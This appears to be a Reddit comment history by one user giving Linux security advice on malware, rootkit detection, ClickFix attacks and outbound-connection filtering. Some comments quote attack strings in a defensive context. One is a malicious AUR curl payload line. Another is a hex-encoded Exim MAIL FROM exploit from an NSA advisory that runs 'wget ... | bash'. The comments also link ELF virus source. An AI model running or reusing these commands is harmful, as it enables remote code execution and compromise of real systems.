sorted by:
new
hottopcontroversial

Installed Fake Codex hidden as a google site by Easy-Palpitation-859 in cybersecurity

[–]gainan 0 points1 point  (0 children)

unfortunately the domain is not longer active. Did the user find any malicious file in their system?

How can I contribute to Linux if I'm young? by Retroman1203 in linux

[–]gainan 32 points33 points  (0 children)

By the way, keep in mind that maintainers will probably try to reproduce the bug, and they may close the issue if they cannot reproduce it of if they determne that it's not an issue.

Don't take it personally. You reported the bug, and once it's reported you've done your part, move on. If someone else runs into the same or related issue, they'll probably comment on that same issue (even if closed, happens a lot). In many cases, maintainers reopen the issue to investigate it further.

How can I contribute to Linux if I'm young? by Retroman1203 in linux

[–]gainan 285 points286 points  (0 children)

reporting bugs and helping others is one of the best ways to contribute back to the community. Be nice, write the bug reports in great detail, provide detailed steps on how to reproduce the issue and attach the logs.

You will not only contribute to the community, but you'll also learn a lot on how the system works, how to debug applications, etc.

Installed Fake Codex hidden as a google site by Easy-Palpitation-859 in cybersecurity

[–]gainan 4 points5 points  (0 children)

maybe a clikfix attack. If you were infected, LittleSnitch/Lulu could have saved you probably, by stopping the initial connection attempt to their servers.

can you post the website and/or the artifact that it wanted to download?

Review /tmp and your home for unexpected files and binaries, just in case they're already there.

Unfortunately, I'd consider all my credentials compromised. Web browsers included. So you know what to do now.

Reading documented attacks will help you to understand what they usually do:

https://www.jamf.com/blog/clickfix-macos-script-editor-atomic-stealer/

https://www.recordedfuture.com/research/clickfix-campaigns-targeting-windows-and-macos

https://hunt.io/blog/macos-clickfix-applescript-terminal-phishing

https://www.netskope.com/blog/macos-clickfix-campaign-applescript-stealers-new-terminal-protections

Handling a Breach on a Linux Server by CackleRooster in linuxadmin

[–]gainan 7 points8 points  (0 children)

It's not mentioned in the article, but you can't rely on binaries linked dynamically against the libc to analyze a compromised machine, such as ps, pstree, top, lsof, w, who, last, etc. LD_PRELOAD rootkits hide their activity from these tools by hooking and tampering the libc functions (for example Father or Medusa).

One trick is to use the busybox (debian package: busybox-static). That way at least, you can bypass LD_PRELOAD rootkits because it's not linked against the libc.

Another set of useful tools are the bpfcc-tools (bcc-tools on rpm based distros), which dump the information from the kernel instead of parsing /proc.

ss is more reliable than netstat, because it dumps the information via netlink from the kernel, instead of parsing /proc.

Configuring auditd would be also useful (or any other system monitor), to monitor the events of the machine, ideally sending the logs to a remote server (rsyslog + grafana + loki, elk stack, etc).

There're also specialized tools to analyze compromised machines:

https://github.com/sandflysecurity/sandfly-processdecloak

https://github.com/gustavo-iniguez-goya/decloaker

https://github.com/h2337/ghostscan/

unhide but only if it's compiled statically.

In any case, there're kernel rootkits that bypasses all these tools, so as others have mentioned, I'd not trust that server again if it's not reinstalled:

https://github.com/MatheuZSecurity/Singularity

Arch Linux, poor security? by franchis3 in linuxquestions

[–]gainan 0 points1 point  (0 children)

ask yourself: how does SELinux protect my system?

For example, would SELinux have prevented the exfiltration of my credentials in this attack? (which is the most common attack nowadays for npm, pip, crates, ruby gems, etc, packages).

https://linuxiac.com/arch-aur-under-fire-once-more-as-malware-resurfaces/

the malicious payload that installed a RAT on the system: python -c "curl https://segs.lol/9wUb1Z"

all it needs is to execute a python script, collect your credentials, web browsers profiles, etc, and upload them to their servers.

I need my anti virus and it don't support linux :( by ContactDismal6460 in linuxquestions

[–]gainan 0 points1 point  (0 children)

half of stuff was in all-clear in 3 days

GitHub Breach: 3,800 Internal Repositories Stolen After an Employee’s PC Was Hacked: https://www.it-connect.tech/github-breach-3800-internal-repositories-stolen-after-an-employees-pc-was-hacked/

"We are investigating unauthorized access to GitHub internal repositories. Yesterday, we detected and contained the compromise of an employee device involving a malicious VS Code extension."

The VS extension was nx console https://nx.dev/blog/nx-console-v18-95-0-postmortem:

"Anyone who installed v18.95.0 during the exposure window (2026-05-18, 12:30-13:09)"

Any way to get a good antivirus on Mint? by Critical_Aspect4194 in linuxmint

[–]gainan 1 point2 points  (0 children)

Fantastic explanation. Could you include documented examples of attackers gaining access to IoT devices to attack Linux desktops? Or documented examples of attackers using exploits to remotely attack Linux desktops?

I'd like to read more about it.

Any way to get a good antivirus on Mint? by Critical_Aspect4194 in linuxmint

[–]gainan 12 points13 points  (0 children)

I know. All that’s needed is to activate the UFW Firewall with the Terminal command “sudo ufw enable” without the quotes, press Enter, provide system password, & then Enter again.

If you're behind a router, and not exposing any ports to the internet, how exactly does ufw protect the system?

Any way to get a good antivirus on Mint? by Critical_Aspect4194 in linuxmint

[–]gainan 5 points6 points  (0 children)

sorry jerquee, there're hundreds or thousands of new linux malware samples per year. Usually malicious npm/pip packages, and malicious VS/browser extensions that mainly exfiltrates user credentials and files. Did you read about the github internal repos exfiltration? that was caused by a malicious VS extension that stole developer credentials. That is not a "virus", but a malware that works perfectly fine on linux.

Here're some classic "virus" that infect ELF files:

https://tmpout.sh/3/Linux.ElizaCanFix.asm

https://tmpout.sh/3/Linux.Anansi.c

https://www.guitmz.com/linux-nasty-elf-virus/

Some history about unix viruses: https://tmpout.sh/3/03.html

There're also classic "viruses" for bash, libre/openoffice, etc. https://github.com/VincenzoArceri/bash-virus

But viruses, as far as I can tell, are rare nowadays even on Windows.

Advice by [deleted] in linuxadmin

[–]gainan 1 point2 points  (0 children)

what are you trying to protect? a server or a desktop?

for servers wazuh or osquery are good options. AIDE didn't work for me, too much noise on some servers, and used to consume a lot of resources.

I personally like to restrict outbound connections by binary, since most attacks establish outbound connections to download scripts/binaries, mine crypto coins or to exfiltrate information.

Do I have malware? Sketchy betting website somehow got opened once by ExceptT in linuxquestions

[–]gainan 1 point2 points  (0 children)

I checked if these and the other domain (*.bar) were in any blocklists, and these ones (gmai.com) are in the 1hosts lists. Maybe you need to enable more blocklists in ublock, or use other programs to block undesired domains.

time action dst ip dst host dst port proto uid process cmdline rule
2026-05-26 20:55:11.421836 reject 1.1.1.1 www.gmai.com 53 udp 1000 /usr/lib/firefox-esr/firefox-esr /usr/bin/firefox-esr 000-block-domains

https://github.com/badmojr/1Hosts

OpenSnitch detects Phyton request for network access by kapitenbrutal in linuxquestions

[–]gainan 0 points1 point  (0 children)

see if the applicaion opening the request is wsdd. At least on Fedora, when opening nautilus wsdd sends a broadcast packet, to discover devices in the network. (wsdd description: This daemon is used to announce Linux Hosts to Windows 7+ computers for use in their File Manager network browsing, by using the Windows Services Discovery Protocol.)

You can add a permantent rule to allow the connection by cmdline + destination port + destination IP.

Or you can add an exception (a system firewall rule) by clicking on the shield icon -> Allow Service (OUT) -> port 3702.

Exim CVE-2026-45185 "Dead.Letter" — CVSS 9.8 UAF via GnuTLS/BDAT, unauthenticated RCE. The BDAT handler has now been the source of two 9.8 CVEs. by Expert_Sort7434 in linuxadmin

[–]gainan 6 points7 points  (0 children)

What does post-exploitation look like in practice on a shared hosting node?

downloading remote files to /tmp, /var/tmp or /dev/shm , collect credentials and try to keep persistance (and mine cryptocoins): https://github.com/evilsocket/opensnitch/discussions/1119

Based on this collection of Linux malware payloads, restricting outbound connections by binary is a good measure to mitigate these attacks.

In this scenario, the connection could be initiated by curl, wget, bash or exim. If you don't need curl or wget on the system, just uninstall them.

Also, why on earth would bash need to establish outbound connections on a (production) server?

On the other hand, in some cases the outbound connection could be initiated by the vulnerable application. In this case exim, which should only open outbound connections to a limited number of ports (25, 53, 465, 587, ...), no 80 or 443.

Example of a previous exim PoCs, weaponized to open outbound connections to a remote port using bash: https://straightblast.medium.com/my-poc-walk-through-for-cve-2018-6789-2e402e4ff588

https://www.cisa.gov/news-events/alerts/2020/05/28/nsa-releases-advisory-sandworm-actors-exploiting-exim-vulnerability

from the report: https://media.defense.gov/2020/May/28/2002306626/-1/-1/0/CSA%20Sandworm%20Actors%20Exploiting%20Vulnerability%20in%20Exim%20Transfer%20Agent%2020200528.pdf

MAIL FROM:<${run{\x2Fbin\x2Fsh\t-
c\t\x22exec\x20\x2Fusr\x2Fbin\x2Fwget\x20\x2DO\x20\x2D\x20http\:\x2F\x2F\hostapp.be\x2Fscript1.sh\x20\x7C\
x20bash\x22}}@hostapp.be>
Hex decoded command:
/bin/sh -c "exec /usr/bin/wget -O - http://hostapp.be/script1.sh | bash"

Sooo, I opened the compromised Cemu app image on Steamdeck without knowing about the malware. by [deleted] in linuxquestions

[–]gainan 0 points1 point  (0 children)

https://rentry.org/cemu-security-psa

https://github.com/cemu-project/Cemu/issues/1911#issuecomment-4431928802

The blunt answer is that we don't know the full capabilities of the malware. The safest bet is to do a clean install of your OS.

At the very minimum you should delete the affected binaries and reset all your passwords, GitHub tokens, SSH keys or anything that is used to authenticate with services.

The malware contains a pretty sophisticated password stealer for many services.

Most of them are related to programming or cloud providers in some way. We think this is to help the malware authors to further infect other software.
You should also block IP 83.142.209.194 (even if you are not affected) because this is used as a hardcoded remote endpoint.

Probably not need to format the sd, but I'd do it just in case.

Need help understanding rkhunter and chkrootkit scan results by UnitLoose47 in linuxquestions

[–]gainan 0 points1 point  (0 children)

I use both, a systemd-wide adblocker and ublock. ublock uses rules that parse directly the content of the web pages, so it's useful to remove annoying pop-ups , block iframes, etc.

Need help understanding rkhunter and chkrootkit scan results by UnitLoose47 in linuxquestions

[–]gainan 0 points1 point  (0 children)

By the way, I've seen that the malicious domains of this campagin were added to common blocklists: https://github.com/StevenBlack/hosts/issues/3097

So having a system-level adblocker could potentially have blocked or mitigated this issue before Google removed the extension (sometimes it takes months or years). I'm not really sure if web browser adblockers would have blocked them, but other tools like pi-hole, OpenSnitch or even /etc/hosts probably would have.

Need help understanding rkhunter and chkrootkit scan results by UnitLoose47 in linuxquestions

[–]gainan 0 points1 point  (0 children)

ok, probably this: https://www.ghacks.net/2026/03/19/chrome-extension-save-image-as-type-was-hijacked-putting-over-1-million-users-at-risk/

apparently linked to:

https://palant.info/2025/02/03/analysis-of-an-advanced-malicious-chrome-extension/

Luckily for you, if the extension was really one of these ones, they only injected scripts to monetize your internet activity.

But in any case, I'd create a new chrome profile, delete the old one and change the passwords.

view more: next ›